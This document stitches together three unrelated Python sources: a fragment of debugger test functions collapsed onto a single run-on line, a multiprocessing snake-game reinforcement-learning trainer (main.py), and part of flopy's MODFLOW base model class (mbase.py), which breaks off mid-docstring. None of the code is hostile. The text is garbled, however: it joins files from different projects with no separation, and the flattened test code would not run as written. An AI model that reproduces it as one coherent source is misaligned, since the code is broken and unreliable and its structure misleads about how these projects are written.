set_trace(Config=MyConfig) assert pdb.local.GLOBAL_PDB.start_lineno == set_trace_lineno check(fn, r""" config_setup [NUM] > .*fn() -> assert pdb.local.GLOBAL_PDB.start_lineno == set_trace_lineno 5 frames hidden .* # c """) def test_do_bt(): def fn(): set_trace() expected_bt = [] for i, entry in enumerate(traceback.extract_stack()[:-3]): expected_bt.append(" [%2d] .*" % i) expected_bt.append(" .*") check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace() 5 frames hidden .* # bt {expected} [NUM] .*(NUM)runpdb() func() > [NUM] .*(NUM)fn()->None set_trace() # c """.format(expected="\n".join(expected_bt))) def test_do_bt_highlight(): def fn(): set_trace(Config=ConfigWithHighlight) expected_bt = [] for i, entry in enumerate(traceback.extract_stack()[:-3]): expected_bt.append(" [%2d] .*" % i) expected_bt.append(" .*") check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace(Config=ConfigWithHighlight) 5 frames hidden .* # bt {expected} [NUM] ^[[33;01m.*\.py^[[00m(^[[36;01mNUM^[[00m)runpdb() func() > [NUM] ^[[33;01m.*\.py^[[00m(^[[36;01mNUM^[[00m)fn()->None set_trace(Config=ConfigWithHighlight) # c """.format(expected="\n".join(expected_bt))) def test_do_bt_pygments(): def fn(): set_trace(Config=ConfigWithPygments) expected_bt = [] for i, entry in enumerate(traceback.extract_stack()[:-3]): expected_bt.append(" [%2d] .*" % i) expected_bt.append(" .*") check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace(Config^[[38;5;241m=^[[39mConfigWithPygments) 5 frames hidden .* # bt {expected} [NUM] .*(NUM)runpdb() func() > [NUM] .*\.py(NUM)fn()->None 
set_trace(Config^[[38;5;241m=^[[39mConfigWithPygments) # c """.format(expected="\n".join(expected_bt))) def test_debug_with_pygments(): def fn(): set_trace(Config=ConfigWithPygments) check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace(Config^[[38;5;241m=^[[39mConfigWithPygments) 5 frames hidden .* # debug 1 ENTERING RECURSIVE DEBUGGER [1] > <string>(1)<module>()->None (#) c LEAVING RECURSIVE DEBUGGER # c """) def test_debug_with_pygments_and_highlight(): def fn(): set_trace(Config=ConfigWithPygmentsAndHighlight) check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace(Config^[[38;5;241m=^[[39mConfigWithPygmentsAndHighlight) 5 frames hidden .* # debug 1 ENTERING RECURSIVE DEBUGGER [1] > ^[[33;01m<string>^[[00m(^[[36;01m1^[[00m)<module>()->None (#) c LEAVING RECURSIVE DEBUGGER # c """) def test_set_trace_in_default_code(): """set_trace while not tracing and should not (re)set the global pdb.""" def fn(): def f(): before = pdb.local.GLOBAL_PDB set_trace(cleanup=False) assert before is pdb.local.GLOBAL_PDB set_trace() check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace() 5 frames hidden .* # f() # import pdb; pdb.local.GLOBAL_PDB.curframe is not None True # l {line_num}, 2 NUM \t def fn(): NUM \t def f(): NUM \t before = pdb.local.GLOBAL_PDB # c """.format( line_num=fn.__code__.co_firstlineno, )) def test_error_with_pp(): def fn(): class BadRepr: def __repr__(self): raise Exception('repr_exc') obj = BadRepr() # noqa: F841 set_trace() check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace() 5 frames hidden .* # p obj \*\*\* Exception: repr_exc # pp obj \*\*\* Exception: repr_exc # c """) def test_do_source(): def fn(): set_trace() check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace() 5 frames hidden .* # source ConfigWithPygmentsAndHighlight \d\d class ConfigWithPygmentsAndHighlight(ConfigWithPygments, ConfigWithHigh$ \d\d pass # c """) def test_do_source_with_pygments(): def fn(): set_trace(Config=ConfigWithPygments) check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace(Config^[[38;5;241m=^[[39mConfigWithPygments) 5 frames hidden .* # source ConfigWithPygmentsAndHighlight \d\d ^[[38;5;28;01mclass^[[39;00m ^[[38;5;21;01mConfigWithPygmentsAndHighlight^[[39;00m(ConfigWithPygments, ConfigWithHigh$ \d\d ^[[38;5;28;01mpass^[[39;00m # c """) # noqa: E501 def test_do_source_with_highlight(): def fn(): set_trace(Config=ConfigWithHighlight) check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace(Config=ConfigWithHighlight) 5 frames hidden .* # source ConfigWithPygmentsAndHighlight ^[[36;01m\d\d^[[00m class ConfigWithPygmentsAndHighlight(ConfigWithPygments, ConfigWithHigh$ ^[[36;01m\d\d^[[00m pass # c """) # noqa: E501 def test_do_source_with_pygments_and_highlight(): def fn(): set_trace(Config=ConfigWithPygmentsAndHighlight) check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace(Config^[[38;5;241m=^[[39mConfigWithPygmentsAndHighlight) 5 frames hidden .* # source ConfigWithPygmentsAndHighlight ^[[36;01m\d\d^[[00m ^[[38;5;28;01mclass^[[39;00m ^[[38;5;21;01mConfigWithPygmentsAndHighlight^[[39;00m(ConfigWithPygments, ConfigWithHigh$ ^[[36;01m\d\d^[[00m ^[[38;5;28;01mpass^[[39;00m # c """) # noqa: E501 def test_do_source_without_truncating(): def fn(): class Config(ConfigTest): truncate_long_lines = False set_trace(Config=Config) check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace(Config=Config) 5 frames hidden .* # source ConfigWithPygmentsAndHighlight \d\d class ConfigWithPygmentsAndHighlight(ConfigWithPygments, ConfigWithHighlight):$ \d\d pass # c """)
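# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original suite): the expected-output
# templates passed to check() above mix plain regular expressions (note the
# many `.*` and escaped `\*`) with shorthand placeholders such as NUM.
# The helper below is a hypothetical, minimal version of that placeholder
# expansion; the exact replacements used by the real harness are assumptions.
import re


def _template_line_matches(template_line, output_line):
    """Match one expected-output template line against one output line."""
    # Escape the literal brackets first, then expand the assumed NUM
    # shorthand into "one or more digits".
    pattern = template_line.replace("[", r"\[").replace("]", r"\]")
    pattern = pattern.replace("NUM", r"\d+")
    return re.match(pattern, output_line) is not None


# e.g. _template_line_matches("[NUM] > .*fn()", "[3] > /tmp/t.py(7)fn()")
# returns True.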
main.py
from game import Snake
from agent import Agent
from settings import *
from enum import Enum
import multiprocessing as mp
from multiprocessing import Pool, Process
import os
import json
import random


class Windows(Enum):
    """
    Windows enums
    W_i = (m, n, s, k) where
        m is number of row tiles
        n is number of column tiles
        s is number of row processors
        k is number of column processors
    """
    #W1 = (20, 20, 1, 3)
    # W2 = (20, 20, 3, 1)
    # W5 = (20, 20, 3, 1)
    #W4 = (20, 20, 1, 1)
    # W6 = (20, 20, 3, 1)
    # W7 = (20, 20, 3, 1)
    # W8 = (20, 20, 3, 1)
    # W9 = (20, 20, 3, 1)
    # W10 = (20, 20, 3, 1)
    # W11 = (20, 20, 3, 1)
    # W12 = (20, 20, 3, 1)
    # W13 = (20, 20, 3, 1)
    W14 = (20, 20, 1, 1)


class Game:
    """
    Run the Game
    Read the json file par_lev.json
    run all the processors with .json parameters
    """

    def __init__(self, lv=1):
        """
        (Game, int) -> None
        initialize the game and the world you want the game to run in
        lv: level selected in pygame; by default it is set to world 1
        """
        self.lv = lv
        self.awake()

    def awake(self):
        """
        (Game) -> None
        read the json file
        get the worlds with their parameters
        iterate through all the worlds until we find the world we initialized
        create the environments
        run the processors in parallel with each other using multiprocessing
        """
        processes = []
        with open('par_lev.json', 'r') as file:
            json_pars = json.load(file)
        # get all enum Windows
        for window in Windows:
            # get the specific window from the json file
            pars = json_pars.get(window.name, [{}])
            # check if this window is the one we initialized
            if window.name == "W" + str(self.lv):
                # take the window and unpack its values
                n, m, k, l = window.value
                # set screen size with nxm tiles
                n, m = (set_size(n), set_size(m))
                index = 0
                # change the position of the screen of each processor window
                # accordingly
                # NOTE: the margin might not be what you expect
                for i in range(k):
                    for j in range(l):
                        os.environ['SDL_VIDEO_WINDOW_POS'] = "%d,%d" % (
                            100 + (n + m) * i, 100 + (n + m) * j)
                        # create the processors and add them to the pool
                        if index < len(pars) and len(pars) > 0:
                            p = Process(target=self.train,
                                        args=(n, m, pars[index]))
                        elif len(pars) >= index:
                            p = Process(target=self.train, args=(n, m, {}))
                        else:
                            p = Process(target=self.train,
                                        args=(n, m, pars[0]))
                        # start processors
                        p.start()
                        processes.append(p)
                        index += 1
                break
        for p in processes:
            # join every processor
            p.join()

    # save run stats to a txt file at a specified path
    # txt files are used by build_graphs.py to build graphs
    def save_to_file(self, path, game_num, score, record):
        """
        (Game, str, int, int, int) -> None
        save to a .txt file
        save game, score, record in the following format:
        g s r
        respectively
        path: path of the txt file
        game_num: total number of generations
        score: current score taken from the game
        record: highest score
        """
        with open(path, "a+") as file:
            file.write("%s %s %s\n" % (game_num, score, record))

    def train(self, n, m, pars):
        """
        (Game, int, int, dict) -> None
        train the game and run each step as a sequence of frames
        n: row tiles of the screen
        m: col tiles of the screen
        pars: parameters passed in for each processor
        """
        # initialize
        record = 0
        game = Snake(n, m, pars.get('n_food', None))
        agent = Agent(game, pars)

        while True:
            # get old state
            state_old = game.get_state()

            # get move
            final_move = agent.get_action(state_old)

            # perform move and get new state
            reward, done, score = game.play_step(final_move, pars)
            state_new = game.get_state()

            # train short memory
            agent.train_short_memory(state_old, final_move, reward,
                                     state_new, done)

            # remember
            agent.remember(state_old, final_move, reward, state_new, done)

            # end the game if it reached num_games from pars or
            # DEFAULT_END_GAME_POINT; if set to -1 then run forever
            if pars.get('num_games', DEFAULT_END_GAME_POINT) != -1:
                if agent.n_games > pars.get('num_games',
                                            DEFAULT_END_GAME_POINT):
                    quit()

            # when game is over
            if done:
                # reset game attributes
                # increase game generation
                # train the long memory
                game.reset()
                agent.n_games += 1
                agent.train_long_memory()

                # new highscore
                if score > record:
                    record = score
                    # save the best model_state
                    #agent.model.save()

                # takes away food depending on given probability,
                # up until 1 food remains
                decrease_probability = pars.get('decrease_food_chance',
                                                DECREASE_FOOD_CHANCE)
                if (game.n_food > 1) and (random.random() < decrease_probability):
                    game.n_food -= 1

                # prints game information to the console
                print('Game', agent.n_games, 'Score', score, 'Record:', record)

                # appends game information to a txt file at the specified path
                self.save_to_file(f"graphs/{pars.get('graph', 'test')}.txt",
                                  agent.n_games, score, record)


if __name__ == "__main__":
    # for i in range(2, 3):
    #     Game(i)
    Game(14)
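# ---------------------------------------------------------------------------
# Illustrative sketch (not from the original file): save_to_file() above
# appends one "game score record" triple per line, and the comments say
# build_graphs.py consumes these txt files. A reader for that format could
# look roughly like the function below; its name and return layout are
# assumptions, not taken from build_graphs.py itself.
def load_stats(path):
    """Parse the 'g s r' lines written by Game.save_to_file into int triples."""
    stats = []
    with open(path) as fh:
        for line in fh:
            game_num, score, record = line.split()
            stats.append((int(game_num), int(score), int(record)))
    return stats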
mbase.py
""" mbase module This module contains the base model class from which all of the other models inherit from. """ from __future__ import print_function import abc import sys import os import subprocess as sp import shutil import threading import warnings if sys.version_info > (3, 0): import queue as Queue else: import Queue from datetime import datetime import copy import numpy as np from flopy import utils, discretization from .version import __version__ from .discretization.modeltime import ModelTime from .discretization.grid import Grid if sys.version_info >= (3, 3): from shutil import which else: from distutils.spawn import find_executable as which # Global variables iconst = 1 # Multiplier for individual array elements in integer and real arrays read by MODFLOW's U2DREL, U1DREL and U2DINT. iprn = -1 # Printout flag. If >= 0 then array values read are printed in listing file. class FileDataEntry(object): def __init__(self, fname, unit, binflag=False, output=False, package=None): self.fname = fname self.unit = unit self.binflag = binflag self.output = output self.package = package class FileData(object): def __init__(self): self.file_data = [] return def add_file(self, fname, unit, binflag=False, output=False, package=None): ipop = [] for idx, file_data in enumerate(self.file_data): if file_data.fname == fname or file_data.unit == unit: ipop.append(idx) self.file_data.append(FileDataEntry(fname, unit, binflag=binflag, output=output, package=package)) return class ModelInterface(object): def __init__(self): self._mg_resync = True self._modelgrid = None @property @abc.abstractmethod def modelgrid(self): raise NotImplementedError( 'must define modelgrid in child ' 'class to use this base class') @property @abc.abstractmethod def packagelist(self): raise NotImplementedError( 'must define packagelist in child ' 'class to use this base class') @property @abc.abstractmethod def namefile(self): raise NotImplementedError( 'must define namefile in child ' 'class to use this base class') @property @abc.abstractmethod def model_ws(self): raise NotImplementedError( 'must define model_ws in child ' 'class to use this base class') @property @abc.abstractmethod def exename(self): raise NotImplementedError( 'must define exename in child ' 'class to use this base class') @property @abc.abstractmethod def version(self): raise NotImplementedError( 'must define version in child ' 'class to use this base class') @property @abc.abstractmethod def solver_tols(self): raise NotImplementedError( 'must define version in child ' 'class to use this base class') @abc.abstractmethod def export(self, f, **kwargs): raise NotImplementedError( 'must define export in child ' 'class to use this base class') @property @abc.abstractmethod def laytyp(self): raise NotImplementedError( 'must define laytyp in child ' 'class to use this base class') @property @abc.abstractmethod def hdry(self): raise NotImplementedError( 'must define hdry in child ' 'class to use this base class') @property @abc.abstractmethod def hnoflo(self): raise NotImplementedError( 'must define hnoflo in child ' 'class to use this base class') @property @abc.abstractmethod def laycbd(self): raise NotImplementedError( 'must define laycbd in child ' 'class to use this base class') @property @abc.abstractmethod def verbose(self): raise NotImplementedError( 'must define verbose in child ' 'class to use this base class') class BaseModel(ModelInterface): """ MODFLOW based models base class Parameters ---------- modelname : string Name of the model. 
class BaseModel(ModelInterface):
    """
    MODFLOW based models base class

    Parameters
    ----------
    modelname : string
        Name of the model.  Model files will be given this name.
        (default is 'modflowtest')
    namefile_ext : string
        name file extension (default is 'nam')
    exe_name : string
        name of the modflow executable
    model_ws : string
        Path to the model workspace.  Model files will be created in this
        directory.  Default is None, in which case model_ws is assigned
        to the current working directory.

    """

    def __init__(self, modelname='modflowtest', namefile_ext='nam',
                 exe_name='mf2k.exe', model_ws=None,
                 structured=True, verbose=False, **kwargs):
        """
        BaseModel init
        """
        ModelInterface.__init__(self)
        self.__name = modelname
        self.namefile_ext = namefile_ext or ''
        self._namefile = self.__name + '.' + self.namefile_ext
        self._packagelist = []
        self.heading = ''
        self.exe_name = exe_name
        self._verbose = verbose
        self.external_extension = 'ref'
        if model_ws is None:
            model_ws = os.getcwd()
        if not os.path.exists(model_ws):
            try:
                os.makedirs(model_ws)
            except:
                print('\n{0:s} not valid, workspace-folder was changed to '
                      '{1:s}\n'.format(model_ws, os.getcwd()))
                model_ws = os.getcwd()
        self._model_ws = model_ws
        self.structured = structured
        self.pop_key_list = []
        self.cl_params = ''

        # check for reference info in kwargs
        # we are just carrying these until a dis package is added
        xll = kwargs.pop("xll", None)
        yll = kwargs.pop("yll", None)
        self._xul = kwargs.pop("xul", None)
        if self._xul is not None:
            warnings.warn('xul/yul have been deprecated. Use xll/yll instead.',
                          DeprecationWarning)
        self._yul = kwargs.pop("yul", None)
        if self._yul is not None:
            warnings.warn('xul/yul have been deprecated. Use xll/yll instead.',
                          DeprecationWarning)

        rotation = kwargs.pop("rotation", 0.0)
        proj4_str = kwargs.pop("proj4_str", None)
        self._start_datetime = kwargs.pop("start_datetime", "1-1-1970")

        # build model discretization objects
        self._modelgrid = Grid(proj4=proj4_str, xoff=xll, yoff=yll,
                               angrot=rotation)
        self._modeltime = None

        # Model file information
        self.__onunit__ = 10
        # external option stuff
        self.array_free_format = True
        self.free_format_input = True
        self.parameter_load = False
        self.array_format = None
        self.external_fnames = []
        self.external_units = []
        self.external_binflag = []
        self.external_output = []
        self.package_units = []
        self._next_ext_unit = None

        # output files
        self.output_fnames = []
        self.output_units = []
        self.output_binflag = []
        self.output_packages = []
        return

    @property
    def modeltime(self):
        raise NotImplementedError(
            'must define modeltime in child '
            'class to use this base class')

    @property
    def modelgrid(self):
        raise NotImplementedError(
            'must define modelgrid in child '
            'class to use this base class')

    @property
    def packagelist(self):
        return self._packagelist

    @packagelist.setter
    def packagelist(self, packagelist):
        self._packagelist = packagelist

    @property
    def namefile(self):
        return self._namefile

    @namefile.setter
    def namefile(self, namefile):
        self._namefile = namefile

    @property
    def model_ws(self):
        return self._model_ws

    @model_ws.setter
    def model_ws(self, model_ws):
        self._model_ws = model_ws

    @property
    def exename(self):
        return self._exename

    @exename.setter
    def exename(self, exename):
        self._exename = exename

    @property
    def version(self):
        return self._version

    @version.setter
    def version(self, version):
        self._version = version

    @property
    def verbose(self):
        return self._verbose

    @verbose.setter
    def verbose(self, verbose):
        self._verbose = verbose

    @property
    def laytyp(self):
        if self.get_package("LPF") is not None:
            return self.get_package("LPF").laytyp.array
        if self.get_package("BCF6") is not None:
            return self.get_package("BCF6").laycon.array
        if self.get_package("UPW") is not None:
            # UPW stores the layer type as laytyp (laycon is a BCF6 name)
            return self.get_package("UPW").laytyp.array
        return None

    @property
    def hdry(self):
        if self.get_package("LPF") is not None:
            return self.get_package("LPF").hdry
        if self.get_package("BCF6") is not None:
            return self.get_package("BCF6").hdry
        if self.get_package("UPW") is not None:
            return self.get_package("UPW").hdry
        return None

    @property
    def hnoflo(self):
        try:
            bas6 = self.get_package("BAS6")
            return bas6.hnoflo
        except AttributeError:
            return None

    @property
    def laycbd(self):
        try:
            dis = self.get_package("DIS")
            return dis.laycbd.array
        except AttributeError:
            return None

    # we don't need these - no need for controlled access to array_free_format
    # def set_free_format(self, value=True):
    #     """
    #     Set the free format flag for the model instance
    #
    #     Parameters
    #     ----------
    #     value : bool
    #         Boolean value to set free format flag for model.
    #         (default is True)
    #
    #     """
    #     if not isinstance(value, bool):
    #         print('Error: set_free_format passed value must be a boolean')
    #         return False
    #     self.array_free_format = value
    #
    # def get_free_format(self):
    #     """
    #     Return the free format flag for the model
    #
    #     Returns
    #     -------
    #     out : bool
    #         Free format flag for the model
    #
    #     """
    #     return self.array_free_format

    def next_unit(self, i=None):
        if i is not None:
            self.__onunit__ = i - 1
        else:
            self.__onunit__ += 1
        return self.__onunit__

    def next_ext_unit(self):
        """
        Function to encapsulate next_ext_unit attribute

        """
        next_unit = self._next_ext_unit + 1
        self._next_ext_unit += 1
        return next_unit

    def export(self, f, **kwargs):
        # for pak in self.packagelist:
        #     f = pak.export(f)
        # return f
        from .export import utils
        return utils.model_export(f, self, **kwargs)

    def add_package(self, p):
        """
        Add a package.

        Parameters
        ----------
        p : Package object

        """
        for idx, u in enumerate(p.unit_number):
            if u != 0:
                if u in self.package_units or u in self.external_units:
                    try:
                        pn = p.name[idx]
                    except:
                        pn = p.name
                    msg = "WARNING: unit {} ".format(u) + \
                          "of package {} already in use".format(pn)
                    print(msg)
            self.package_units.append(u)
        for i, pp in enumerate(self.packagelist):
            if pp.allowDuplicates:
                continue
            elif isinstance(p, type(pp)):
                print('****Warning -- two packages of the same type: ',
                      type(p), type(pp))
                print('replacing existing Package...')
                self.packagelist[i] = p
                return
        if self.verbose:
            print('adding Package: ', p.name[0])
        self.packagelist.append(p)

    def remove_package(self, pname):
        """
        Remove a package from this model

        Parameters
        ----------
        pname : string
            Name of the package, such as 'RIV', 'BAS6', etc.

        """
        for i, pp in enumerate(self.packagelist):
            if pname.upper() in pp.name:
                if self.verbose:
                    print('removing Package: ', pp.name)

                # Remove the package object from the model's packagelist
                p = self.packagelist.pop(i)

                # Remove the package unit number from the list of package
                # units stored with the model
                for iu in p.unit_number:
                    if iu in self.package_units:
                        self.package_units.remove(iu)
                return
        raise StopIteration(
            'Package name ' + pname + ' not found in Package list')
    def __getattr__(self, item):
        """
        __getattr__ - syntactic sugar

        Parameters
        ----------
        item : str
            3 character package name (case insensitive) or "sr" to access
            the SpatialReference instance of the ModflowDis object

        Returns
        -------
        sr : SpatialReference instance
        pp : Package object
            Package object of type :class:`flopy.pakbase.Package`

        Note
        ----
        if self.dis is not None, then the spatial reference instance is
        updated using self.dis.delr, self.dis.delc, and self.dis.lenuni
        before being returned
        """
        if item == 'sr':
            if self.dis is not None:
                return self.dis.sr
            else:
                return None
        if item == 'tr':
            if self.dis is not None:
                return self.dis.tr
            else:
                return None
        if item == "start_datetime":
            if self.dis is not None:
                return self.dis.start_datetime
            else:
                return None
        return self.get_package(item)

    def get_ext_dict_attr(self, ext_unit_dict=None, unit=None, filetype=None,
                          pop_key=True):
        iu = None
        fname = None
        if ext_unit_dict is not None:
            for key, value in ext_unit_dict.items():
                if key == unit:
                    iu = key
                    fname = os.path.basename(value.filename)
                    break
                elif value.filetype == filetype:
                    iu = key
                    fname = os.path.basename(value.filename)
                    if pop_key:
                        self.add_pop_key_list(iu)
                    break
        return iu, fname

    def _output_msg(self, i, add=True):
        if add:
            txt1 = 'Adding'
            txt2 = 'to'
        else:
            txt1 = 'Removing'
            txt2 = 'from'
        msg = '{} {} '.format(txt1, self.output_fnames[i]) + \
              '(unit={}) '.format(self.output_units[i]) + \
              '{} the output list.'.format(txt2)
        print(msg)

    def add_output_file(self, unit, fname=None, extension='cbc',
                        binflag=True, package=None):
        """
        Add an ascii or binary output file for a package

        Parameters
        ----------
        unit : int
            unit number of external array
        fname : str
            filename of external array. (default is None)
        extension : str
            extension to use for the cell-by-cell file. Only used if fname
            is None. (default is cbc)
        binflag : bool
            boolean flag indicating if the output file is a binary file.
            Default is True
        package : str
            string that defines the package the output file is attached to.
            Default is None

        """
        add_cbc = False
        if unit > 0:
            add_cbc = True

        # determine if the file is in external_units
        if abs(unit) in self.external_units:
            idx = self.external_units.index(abs(unit))
            if fname is None:
                fname = os.path.basename(self.external_fnames[idx])
            binflag = self.external_binflag[idx]
            self.remove_external(unit=abs(unit))

        # determine if the unit exists in the output data
        if abs(unit) in self.output_units:
            add_cbc = False
            idx = self.output_units.index(abs(unit))
            # determine if binflag has changed
            if binflag is not self.output_binflag[idx]:
                add_cbc = True
            if add_cbc:
                self.remove_output(unit=abs(unit))
            else:
                if package is not None:
                    self.output_packages[idx].append(package)

        if add_cbc:
            if fname is None:
                fname = self.name + '.' + extension
                # check if this file name exists for a different unit number
                if fname in self.output_fnames:
                    idx = self.output_fnames.index(fname)
                    iut = self.output_units[idx]
                    if iut != unit:
                        # include unit number in fname if package has
                        # not been passed
                        if package is None:
                            fname = self.name + '.{}.'.format(unit) + \
                                    extension
                        # include package name in fname
                        else:
                            fname = self.name + '.{}.'.format(package) + \
                                    extension
            else:
                fname = os.path.basename(fname)
            self.add_output(fname, unit, binflag=binflag, package=package)
        return

    def add_output(self, fname, unit, binflag=False, package=None):
        """
        Assign an external array so that it will be listed as a DATA or
        DATA(BINARY) entry in the name file.  This will allow an outside
        file package to refer to it.

        Parameters
        ----------
        fname : str
            filename of external array
        unit : int
            unit number of external array
        binflag : boolean
            binary or not. (default is False)

        """
        if fname in self.output_fnames:
            print("BaseModel.add_output() warning: " +
                  "replacing existing filename {0}".format(fname))
            idx = self.output_fnames.index(fname)
            if self.verbose:
                self._output_msg(idx, add=False)
            self.output_fnames.pop(idx)
            self.output_units.pop(idx)
            self.output_binflag.pop(idx)
            self.output_packages.pop(idx)

        self.output_fnames.append(fname)
        self.output_units.append(unit)
        self.output_binflag.append(binflag)
        if package is not None:
            self.output_packages.append([package])
        else:
            self.output_packages.append([])

        if self.verbose:
            self._output_msg(-1, add=True)
        return

    def remove_output(self, fname=None, unit=None):
        """
        Remove an output file from the model by specifying either the
        file name or the unit number.

        Parameters
        ----------
        fname : str
            filename of output array
        unit : int
            unit number of output array

        """
        if fname is not None:
            for i, e in enumerate(self.output_fnames):
                if fname in e:
                    if self.verbose:
                        self._output_msg(i, add=False)
                    self.output_fnames.pop(i)
                    self.output_units.pop(i)
                    self.output_binflag.pop(i)
                    self.output_packages.pop(i)
        elif unit is not None:
            for i, u in enumerate(self.output_units):
                if u == unit:
                    if self.verbose:
                        self._output_msg(i, add=False)
                    self.output_fnames.pop(i)
                    self.output_units.pop(i)
                    self.output_binflag.pop(i)
                    self.output_packages.pop(i)
        else:
            raise Exception(
                ' either fname or unit must be passed to remove_output()')
        return

    def get_output(self, fname=None, unit=None):
        """
        Get an output file from the model by specifying either the
        file name or the unit number.

        Parameters
        ----------
        fname : str
            filename of output array
        unit : int
            unit number of output array

        """
        if fname is not None:
            for i, e in enumerate(self.output_fnames):
                if fname in e:
                    return self.output_units[i]
            return None
        elif unit is not None:
            for i, u in enumerate(self.output_units):
                if u == unit:
                    return self.output_fnames[i]
            return None
        else:
            raise Exception(
                ' either fname or unit must be passed to get_output()')
        return

    def set_output_attribute(self, fname=None, unit=None, attr=None):
        """
        Set a variable in an output file from the model by specifying either
        the file name or the unit number and a dictionary with attributes
        to change.

        Parameters
        ----------
        fname : str
            filename of output array
        unit : int
            unit number of output array

        """
        idx = None
        if fname is not None:
            for i, e in enumerate(self.output_fnames):
                if fname in e:
                    idx = i
                    break
        elif unit is not None:
            for i, u in enumerate(self.output_units):
                if u == unit:
                    idx = i
                    break
        else:
            raise Exception(
                ' either fname or unit must be passed '
                ' to set_output_attribute()')
        if attr is not None:
            if idx is not None:
                for key, value in attr.items():
                    if key == 'binflag':
                        self.output_binflag[idx] = value
                    elif key == 'fname':
                        self.output_fnames[idx] = value
                    elif key == 'unit':
                        self.output_units[idx] = value
        return

    def get_output_attribute(self, fname=None, unit=None, attr=None):
        """
        Get an attribute for an output file from the model by specifying
        either the file name or the unit number.

        Parameters
        ----------
        fname : str
            filename of output array
        unit : int
            unit number of output array

        """
        idx = None
        if fname is not None:
            for i, e in enumerate(self.output_fnames):
                if fname in e:
                    idx = i
                    break
        elif unit is not None:
            for i, u in enumerate(self.output_units):
                if u == unit:
                    idx = i
                    break
        else:
            raise Exception(
                ' either fname or unit must be passed '
                ' to get_output_attribute()')
        v = None
        if attr is not None:
            if idx is not None:
                if attr == 'binflag':
                    v = self.output_binflag[idx]
                elif attr == 'fname':
                    v = self.output_fnames[idx]
                elif attr == 'unit':
                    v = self.output_units[idx]
        return v

    def add_external(self, fname, unit, binflag=False, output=False):
        """
        Assign an external array so that it will be listed as a DATA or
        DATA(BINARY) entry in the name file.  This will allow an outside
        file package to refer to it.

        Parameters
        ----------
        fname : str
            filename of external array
        unit : int
            unit number of external array
        binflag : boolean
            binary or not. (default is False)

        """
        if fname in self.external_fnames:
            print("BaseModel.add_external() warning: " +
                  "replacing existing filename {}".format(fname))
            idx = self.external_fnames.index(fname)
            self.external_fnames.pop(idx)
            self.external_units.pop(idx)
            self.external_binflag.pop(idx)
            self.external_output.pop(idx)
        if unit in self.external_units:
            print("BaseModel.add_external() warning: " +
                  "replacing existing unit {}".format(unit))
            idx = self.external_units.index(unit)
            self.external_fnames.pop(idx)
            self.external_units.pop(idx)
            self.external_binflag.pop(idx)
            self.external_output.pop(idx)

        self.external_fnames.append(fname)
        self.external_units.append(unit)
        self.external_binflag.append(binflag)
        self.external_output.append(output)
        return

    def remove_external(self, fname=None, unit=None):
        """
        Remove an external file from the model by specifying either the
        file name or the unit number.

        Parameters
        ----------
        fname : str
            filename of external array
        unit : int
            unit number of external array

        """
        plist = []
        if fname is not None:
            for i, e in enumerate(self.external_fnames):
                if fname in e:
                    plist.append(i)
        elif unit is not None:
            for i, u in enumerate(self.external_units):
                if u == unit:
                    plist.append(i)
        else:
            raise Exception(
                ' either fname or unit must be passed to remove_external()')
        # remove external file
        j = 0
        for i in plist:
            ipos = i - j
            self.external_fnames.pop(ipos)
            self.external_units.pop(ipos)
            self.external_binflag.pop(ipos)
            self.external_output.pop(ipos)
            j += 1
        return
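    # Bookkeeping note: external_fnames, external_units, external_binflag and
    # external_output are parallel lists that are always appended and popped
    # together, so an entry's index is its identity across all four.  Sketch
    # (hypothetical model `ml` and file name):
    #
    # >>> ml.add_external('bottom.ref', 51)
    # >>> ml.external_units
    # [51]
    # >>> ml.remove_external(unit=51)
    # >>> ml.external_fnames
    # []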
    def add_existing_package(self, filename, ptype=None,
                             copy_to_model_ws=True):
        """
        Add an existing package to a model instance.

        Parameters
        ----------
        filename : str
            the name of the file to add as a package
        ptype : optional
            the model package type (e.g. "lpf", "wel", etc).  If None,
            then the file extension of the filename arg is used
        copy_to_model_ws : bool
            flag to copy the package file into the model_ws directory.

        Returns
        -------
        None

        """
        if ptype is None:
            ptype = filename.split('.')[-1]
        ptype = str(ptype).upper()

        # for pak in self.packagelist:
        #     if ptype in pak.name:
        #         print("BaseModel.add_existing_package() warning: " +\
        #               "replacing existing package {0}".format(ptype))
        class Obj(object):
            pass

        fake_package = Obj()
        fake_package.write_file = lambda: None
        fake_package.extra = ['']
        fake_package.name = [ptype]
        fake_package.extension = [filename.split('.')[-1]]
        fake_package.unit_number = [self.next_ext_unit()]
        if copy_to_model_ws:
            base_filename = os.path.split(filename)[-1]
            fake_package.file_name = [base_filename]
            shutil.copy2(filename, os.path.join(self.model_ws, base_filename))
        else:
            fake_package.file_name = [filename]
        fake_package.allowDuplicates = True
        self.add_package(fake_package)

    def get_name_file_entries(self):
        """
        Get a string representation of the name file.

        """
        s = ''
        for p in self.packagelist:
            for i in range(len(p.name)):
                if p.unit_number[i] == 0:
                    continue
                s += '{:14s} {:5d} '.format(p.name[i], p.unit_number[i]) + \
                     '{:s} {:s}\n'.format(p.file_name[i], p.extra[i])
        return s

    def has_package(self, name):
        """
        Check if package name is in package list.

        Parameters
        ----------
        name : str
            Name of the package, 'DIS', 'BAS6', etc. (case-insensitive).

        Returns
        -------
        bool
            True if package name exists, otherwise False if not found.

        """
        if not name:
            raise ValueError('invalid package name')
        name = name.upper()
        for p in self.packagelist:
            for pn in p.name:
                if pn.upper() == name:
                    return True
        return False

    def get_package(self, name):
        """
        Get a package.

        Parameters
        ----------
        name : str
            Name of the package, 'RIV', 'LPF', etc. (case-insensitive).

        Returns
        -------
        pp : Package object
            Package object of type :class:`flopy.pakbase.Package`

        """
        if not name:
            raise ValueError('invalid package name')
        name = name.upper()
        for pp in (self.packagelist):
            if pp.name[0].upper() == name:
                return pp
        return None

    def get_package_list(self, ftype=None):
        """
        Get a list of all the package names.

        Parameters
        ----------
        ftype : str
            Type of package, 'RIV', 'LPF', etc.

        Returns
        -------
        val : list of strings
            Can be used to see what packages are in the model, and can
